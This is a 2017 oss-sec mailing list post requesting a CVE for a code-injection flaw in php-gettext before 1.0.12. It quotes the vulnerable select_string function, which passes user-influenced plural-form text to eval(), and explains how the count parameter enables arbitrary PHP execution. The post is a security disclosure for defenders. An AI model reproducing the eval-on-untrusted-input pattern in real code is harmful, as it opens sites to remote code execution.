oss-sec mailing list archives

Previous By Date Next
Previous By Thread Next

CVE Request: php-gettext: Arbitrary code execution in select_string, ngettext and npgettext count parameter

From: Salvatore Bonaccorso <carnil () debian org>
Date: Tue, 17 Jan 2017 19:34:20 +0100
Hi

Could you please assign a CVE to the followign php-gettext[0] issue:


From [1]:
A code injection vulnerability was found in php-gettext. Evaluating
the plural form formula in ngettext family of calls can execute
arbitrary code if number is passed unsanitized from the untrusted
user.


Which in Fedora was addressed by updating to 1.0.12, cf [2]. Original
report is found in [3]:

CERT ID - VU#520504 (pending since 2015)
Product - php-gettext
Company - Danilo Segan
Name - php-gettext php code execution
Versions - <1.0.12
Patched - 11/11/2015
Ref: https://launchpad.net/php-gettext/trunk/1.0.12

Vulnerability - "code injection into the ngettext family of calls:
evaluating the plural form formula can execute arbitrary code if
number is passed unsanitized from the untrusted user."

Description -
In 1.0.11 and lower the select_string function appears as the
following:

  /**
   * Detects which plural form to take
   *
   * @access private
   * @param n count
   * @return int array index of the right plural form
   */
  function select_string($n) {
    $string = $this->get_plural_forms();
    $string = str_replace('nplurals',"\$total",$string);
    $string = str_replace("n",$n,$string);
    $string = str_replace('plural',"\$plural",$string);
    $total = 0;
    $plural = 0;
    eval("$string");
    if ($plural >= $total) $plural = $total - 1;
    return $plural;
  }

The vulnerability here lies in the fact that $string is evaluated as
PHP code. If the plural form contains an 'n', and the $n parameter
is exposed to a malicious user, PHP code can be added to the value
of $string before it is evaluated. For websites, this means that a
vulnerable application could allow an attacker to run PHP code on
your site and potentially gain control of it.


The $n parameter in select_string can also be exposed through
ngettext and npgettext as the $number parameter.


The new release 1.0.12 was made available shortly after notification
in 2015 and resolves the issue by raising an exception during
non-numeric input to these parameters.


 [0] https://launchpad.net/php-gettext/
 [1] https://bugzilla.redhat.com/show_bug.cgi?id=1367462
 [2] https://lwn.net/Alerts/708838/
 [3] http://seclists.org/fulldisclosure/2016/Aug/76

 Regards,
 Salvatore
Previous By Date Next
Previous By Thread Next

Current thread: